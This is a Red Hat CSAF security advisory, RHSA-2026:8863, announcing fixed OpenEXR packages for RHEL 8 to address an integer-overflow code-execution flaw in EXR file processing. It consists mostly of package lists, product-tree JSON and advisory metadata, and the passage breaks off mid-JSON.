"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:8863
Vulnerability from csaf_redhat - Published: 2026-04-20 03:05 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for OpenEXR is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8863",
"url": "https://access.redhat.com/errata/RHSA-2026:8863"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8863.json"
}
],
"title": "Red Hat Security Advisory: OpenEXR security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:31+00:00",
"generator": {
"date": "2026-05-14T22:36:31+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:8863",
"initial_release_date": "2026-04-20T03:05:29+00:00",
"revision_history": [
{
"date": "2026-04-20T03:05:29+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-20T03:05:29+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:31+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CRB (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::crb"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-0:2.2.0-12.el8_10.1.src",
"product": {
"name": "OpenEXR-0:2.2.0-12.el8_10.1.src",
"product_id": "OpenEXR-0:2.2.0-12.el8_10.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR@2.2.0-12.el8_10.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_10.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_10.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_10.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_10.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"product": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"product_id": "OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-devel@2.2.0-12.el8_10.1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_10.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_10.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_10.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_10.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"product": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"product_id": "OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-devel@2.2.0-12.el8_10.1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_10.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_10.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_10.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_10.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"product": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"product_id": "OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-devel@2.2.0-12.el8_10.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_10.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_10.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_10.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_10.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"product": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"product_id": "OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-devel@2.2.0-12.el8_10.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_10.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_10.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_10.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_10.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"product": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"product_id": "OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-devel@2.2.0-12.el8_10.1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_10.1.src as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_10.1.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
